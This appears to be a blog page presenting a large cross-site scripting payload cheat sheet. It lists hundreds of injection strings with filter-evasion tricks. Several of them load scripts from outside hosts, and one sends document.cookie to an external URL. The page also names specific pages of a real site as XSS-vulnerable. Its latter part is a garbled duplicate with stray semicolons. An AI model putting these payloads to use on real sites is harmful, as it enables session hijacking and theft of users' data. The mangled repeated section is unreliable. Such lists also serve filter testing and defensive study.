Ethical Security Hacker Brazil: XSS Syntax's

"><SCRIPT+SRC=http://cim.edu.ph/.../xss.js></SCRIPT>

'';!--"<XSS>=&{()}

'>//\\,<'>">">"*"

'); alert('XSS

<script>alert(1);</script>

<script>alert('XSS');</script>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert("XSS")>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<scr<script>ipt>alert('XSS');</scr</script>ipt>

<script>alert(String.fromCharCode(88,83,83))</script>

<img src=foo.png onerror=alert(/xssed/) />

<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>

<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>

<marquee><script>alert('XSS')</script></marquee>

<IMG SRC=\"jav	ascript:alert('XSS');\">

<IMG SRC=\"jav
ascript:alert('XSS');\">

<IMG SRC=\"javascript:alert('XSS');\">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

"><script>alert(0)</script>

<script src=http://yoursite.com/your_files.js></script>

</title><script>alert(/xss/)</script>

</textarea><script>alert(/xss/)</script>

<IMG LOWSRC=\"javascript:alert('XSS')\">

<IMG DYNSRC=\"javascript:alert('XSS')\">

<font style='color:expression(alert(document.cookie))'>

<img src="javascript:alert('XSS')">

<script language="JavaScript">alert('XSS')</script>

<body onunload="javascript:alert('XSS');">

<body onLoad="alert('XSS');"

[color=red' onmouseover="alert('xss')"]mouse over[/color]

"/></a></><img src=1.gif onerror=alert(1)>

window.alert("Bonjour !");

<div style="x:expression((window.r==1)?'':eval('r=1;

alert(String.fromCharCode(88,83,83));'))">

<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>

"><script alert(String.fromCharCode(88,83,83))</script>

'>><marquee><h1>XSS</h1></marquee>

'">><script>alert('XSS')</script>

'">><marquee><h1>XSS</h1></marquee>

<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">

<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">

<script>var var = 1; alert(var)</script>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<?='<SCRIPT>alert("XSS")</SCRIPT>'?>

<IMG SRC='vbscript:msgbox(\"XSS\")'>

" onfocus=alert(document.domain) "> <"

<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>

<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS

perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out

perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out

<br size=\"&{alert('XSS')}\">

<scrscriptipt>alert(1)</scrscriptipt>

</br style=a:expression(alert())>

</script><script>alert(1)</script>

"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

[color=red width=expression(alert(123))][color]

<BASE HREF="javascript:alert('XSS');//">

Execute(MsgBox(chr(88)&chr(83)&chr(83)))<

"></iframe><script>alert(123)</script>

<body onLoad="while(true) alert('XSS');">

'"></title><script>alert(1111)</script>

</textarea>'"><script>alert(document.cookie)</script>

'""><script language="JavaScript"> alert('X \nS \nS');</script>

</script></script><<<<script><>>>><<<script>alert(123)</script>

<html><noalert><noscript>(123)</noscript><script>(123)</script>

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

'></select><script>alert(123)</script>

'>"><script src = 'http://www.site.com/XSS.js'></script>

}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>

<SCRIPT>document.write("XSS");</SCRIPT>

a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);

='><script>alert("xss")</script>

<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>

<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>

">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>

">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>

src="http://www.site.com/XSS.js"></script>

data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=

!--" /><script>alert('xss');</script>

<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>

"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>

'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>

<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>

<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>

"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>

'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>

<iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>

'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='

"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="

\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'

http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??

http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??

'); alert('xss'); var x='

\\'); alert(\'xss\');var x=\'

//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));

>"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>

<html>

<head><title>p3Lo thx Mario Heiderich work</title></title>

<body>

SVG XSS onerror trough data protocol

<img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img>

</body>

</html>

<SCRIPT>

The <SCRIPT> tag is the most popular way and sometimes easiest to detect. It can arrive to your page in the following forms:

External script:

<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>

Embedded script:

<SCRIPT> alert(“XSS”); </SCRIPT>

<BODY>

The <BODY> tag can contain an embedded script by using the ONLOAD event, as shown below:

<BODY ONLOAD=alert("XSS")>

The BACKGROUND attribute can be similarly exploited:

<BODY BACKGROUND="javascript:alert('XSS')">

<IMG>

Some browsers will execute a script when found in the <IMG> tag as shown here:

<IMG SRC="javascript:alert('XSS');">

There are some variations of this that work in some browsers:

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<IFRAME>

The <IFRAME> tag allows you to import HTML into a page. This important HTML can contain a script.

<IFRAME SRC=”http://hacker-site.com/xss.html”>

<INPUT>

If the TYPE attribute of the <INPUT> tag is set to “IMAGE”, it can be manipulated to embed a script:

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<LINK>

The <LINK> tag, which is often used to link to external style sheets could contain a script:

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<TABLE>

The BACKGROUND attribute of the TABLE tag can be exploited to refer to a script instead of an image:

<TABLE BACKGROUND="javascript:alert('XSS')">

The same applies to the <TD> tag, used to separate cells inside a table:

<TD BACKGROUND="javascript:alert('XSS')">

<DIV>

The <DIV> tag, similar to the <TABLE> and <TD> tags can also specify a background and therefore embed a script:

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

The <DIV> STYLE attribute can also be manipulated in the following way:

<DIV STYLE="width: expression(alert('XSS'));">

<OBJECT>

The <OBJECT> tag can be used to pull in a script from an external site in the following way:

<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html">

<EMBED>

If the hacker places a malicious script inside a flash file, it can be injected in the following way:

<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always">

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

'';!--"<XSS>=&{()}

<SCRIPT>alert('XSS')</SCRIPT>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<BASE HREF="javascript:alert('XSS');//">

<BGSOUND SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS');">

<BODY ONLOAD=alert('XSS')>

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

<DIV STYLE="width: expression(alert('XSS'));">

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG DYNSRC="javascript:alert('XSS');">

<IMG LOWSRC="javascript:alert('XSS');">

<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">

Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

exp/*<XSS STYLE='no\xss:noxss("*//*");

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

<IMG SRC='vbscript:msgbox("XSS")'>

<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>

<IMG SRC="livescript:[code]">

%BCscript%BEalert(%A2XSS%A2)%BC/script%BE

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

<IMG SRC="mocha:[code]">

<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>

<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";
eval(a+b+c+d);

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

<XSS STYLE="xss:expression(alert('XSS'))">

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>

<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>

<HTML xmlns:xss>

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

<XML ID="xss"><I><B><IMG SRC="javascript:alert('XSS')"></B></I></XML>

<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>

<HTML><BODY>



<? echo('<SCR)';

<BR SIZE="&{alert('XSS')}">

<

&#060

&#0060

&#00060

&#000060

&#0000060

&#60;

&#060;

&#0060;

&#00060;

&#000060;

&#0000060;

&#x3c

&#x03c

&#x003c

&#x0003c

&#x00003c

&#x000003c

&#x3c;

&#x03c;

&#x003c;

&#x0003c;

&#x00003c;

&#x000003c;

&#X3c

&#X03c

&#X003c

&#X0003c

&#X00003c

&#X000003c

&#X3c;

&#X03c;

&#X003c;

&#X0003c;

&#X00003c;

&#X000003c;

&#x3C

&#x03C

&#x003C

&#x0003C

&#x00003C

&#x000003C

&#x3C;

&#x03C;

&#x003C;

&#x0003C;

&#x00003C;

&#x000003C;

&#X3C

&#X03C

&#X003C

&#X0003C

&#X00003C

&#X000003C

&#X3C;

&#X03C;

&#X003C;

&#X0003C;

&#X00003C;

&#X000003C;

\x3c

\x3C

\u003c

\u003C

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

\";alert('XSS');//

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG SRC="jav	ascript:alert('XSS');">

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

<IMGSRC="javascript:alert('XSS')">

perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out

perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out

<IMG SRC=" &#14; javascript:alert('XSS');">

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

<SCRIPT SRC=http://ha.ckers.org/xss.js

<SCRIPT SRC=//ha.ckers.org/.j>

<IMG SRC="javascript:alert('XSS')"

<IFRAME SRC=http://ha.ckers.org/scriptlet.html <

<<SCRIPT>alert("XSS");//<</SCRIPT>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<SCRIPT>a=/XSS/

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<A HREF="http://66.102.7.147/">XSS</A>

<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>

<A HREF="http://1113982867/">XSS</A>

<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>

<A HREF="http://0102.0146.0007.00000223/">XSS</A>

<A HREF="h
tt	p://6&#09;6.000146.0x7.147/">XSS</A>

<A HREF="//www.google.com/">XSS</A>

<A HREF="//google">XSS</A>

<A HREF="http://ha.ckers.org@google">XSS</A>

<A HREF="http://google:ha.ckers.org">XSS</A>

<A HREF="http://google.com/">XSS</A>

<A HREF="http://www.google.com./">XSS</A>

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>

<script>document.vulnerable=true;</script>

<img SRC="jav ascript:document.vulnerable=true;">

<img SRC="javascript:document.vulnerable=true;">

<img SRC="  javascript:document.vulnerable=true;">

<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>

<<SCRIPT>document.vulnerable=true;//<</SCRIPT>

<script <B>document.vulnerable=true;</script>

<img SRC="javascript:document.vulnerable=true;"

<iframe src="javascript:document.vulnerable=true; <

<script>a=/XSS/\ndocument.vulnerable=true;</script>

\";document.vulnerable=true;;//

</title><SCRIPT>document.vulnerable=true;</script>

<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">

<body BACKGROUND="javascript:document.vulnerable=true;">

<body ONLOAD=document.vulnerable=true;>

<img DYNSRC="javascript:document.vulnerable=true;">

<img LOWSRC="javascript:document.vulnerable=true;">

<bgsound SRC="javascript:document.vulnerable=true;">

<br SIZE="&{document.vulnerable=true}">

<LAYER SRC="javascript:document.vulnerable=true;"></LAYER>

<link REL="stylesheet" HREF="javascript:document.vulnerable=true;">

<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS

<img SRC='vbscript:document.vulnerable=true;'>

¼script¾document.vulnerable=true;¼/script¾

<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">

<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">

<IFRAME SRC="javascript:document.vulnerable=true;"></iframe>

<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>

<table BACKGROUND="javascript:document.vulnerable=true;">

<table><TD BACKGROUND="javascript:document.vulnerable=true;">

<div STYLE="background-image: url(javascript:document.vulnerable=true;)">

<div STYLE="background-image: url(javascript:document.vulnerable=true;)">

<div STYLE="width: expression(document.vulnerable=true);">

<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>

<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">

<XSS STYLE="xss:expression(document.vulnerable=true)">

exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>

<style TYPE="text/javascript">document.vulnerable=true;</style>

<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a>

<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style>



<base HREF="javascript:document.vulnerable=true;//">

<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>

<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>

<XML ID="xss"><I><B><IMG SRC="javascript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>

<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>

<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>

<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">

<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-

<a href="javascript#document.vulnerable=true;">

<div onmouseover="document.vulnerable=true;">

<img src="javascript:document.vulnerable=true;">

<img dynsrc="javascript:document.vulnerable=true;">

<input type="image" dynsrc="javascript:document.vulnerable=true;">

<bgsound src="javascript:document.vulnerable=true;">

&<script>document.vulnerable=true;</script>

&{document.vulnerable=true;};

<img src=&{document.vulnerable=true;};>

<link rel="stylesheet" href="javascript:document.vulnerable=true;">

<iframe src="vbscript:document.vulnerable=true;">

<img src="mocha:document.vulnerable=true;">

<img src="livescript:document.vulnerable=true;">

<a href="about:<script>document.vulnerable=true;</script>">

<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">

<body onload="document.vulnerable=true;">

<div style="background-image: url(javascript:document.vulnerable=true;);">

<div style="behaviour: url([link to code]);">

<div style="binding: url([link to code]);">

<div style="width: expression(document.vulnerable=true;);">

<style type="text/javascript">document.vulnerable=true;</style>

<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">

<style></script>

<<script>document.vulnerable=true;</script>

<![</script>

<script>document.vulnerable=true;</script>

<img src="blah"onmouseover="document.vulnerable=true;">

<img src="blah>" onmouseover="document.vulnerable=true;">

<xml src="javascript:document.vulnerable=true;">

<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>

<div datafld="b" dataformatas="html" datasrc="#X"></div>

[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>

<style>@import'http://www.securitycompass.com/xss.css';</style>

<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">

<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>

<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>

<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>

<script SRC="http://www.securitycompass.com/xss.jpg"></script>



<script a=">" SRC="http://www.securitycompass.com/xss.js"></script>

<script =">" SRC="http://www.securitycompass.com/xss.js"></script>

<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>

<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>

<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>

<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>

<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>

<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]

"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

</script><script>alert(1)</script>

</br style=a:expression(alert())>

<scrscriptipt>alert(1)</scrscriptipt>

<br size=\"&{alert('XSS')}\">

perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out

perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out

<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>

<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

<~/XSS STYLE=xss:expression(alert('XSS'))>

"><script>alert('XSS')</script>

</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

XSS STYLE=xss:e/**/xpression(alert('XSS'))>

</XSS STYLE=xss:expression(alert('XSS'))>

';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;

';';;!--";<;XSS>;=&;{()}

<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;

<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;

<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;

<;BASE HREF=";javascript:alert(';XSS';);//";>;

<;BGSOUND SRC=";javascript:alert(';XSS';);";>;

<;BODY BACKGROUND=";javascript:alert(';XSS';);";>;

<;BODY ONLOAD=alert(';XSS';)>;

<;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>;

<;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>;

<;DIV STYLE=";width: expression(alert(';XSS';));";>;

<;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>;

<;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>;

<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>;

<;IMG SRC=";javascript:alert(';XSS';);";>;

<;IMG SRC=javascript:alert(';XSS';)>;

<;IMG DYNSRC=";javascript:alert(';XSS';);";>;

<;IMG LOWSRC=";javascript:alert(';XSS';);";>;

<;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>;

Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser

exp/*<;XSS STYLE=';no\xss:noxss(";*//*";);

<;STYLE>;li {list-style-image: url(";javascript:alert('XSS')";);}<;/STYLE>;<;UL>;<;LI>;XSS

<;IMG SRC=';vbscript:msgbox(";XSS";)';>;

<;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>;

<;IMG SRC=";livescript:[code]";>;

%BCscript%BEalert(%A2XSS%A2)%BC/script%BE

<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>;

<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>;

<;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>;

<;IMG SRC=";mocha:[code]";>;

<;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>;

<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>;

<;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>;

a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;
eval(a+b+c+d);

<;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>;

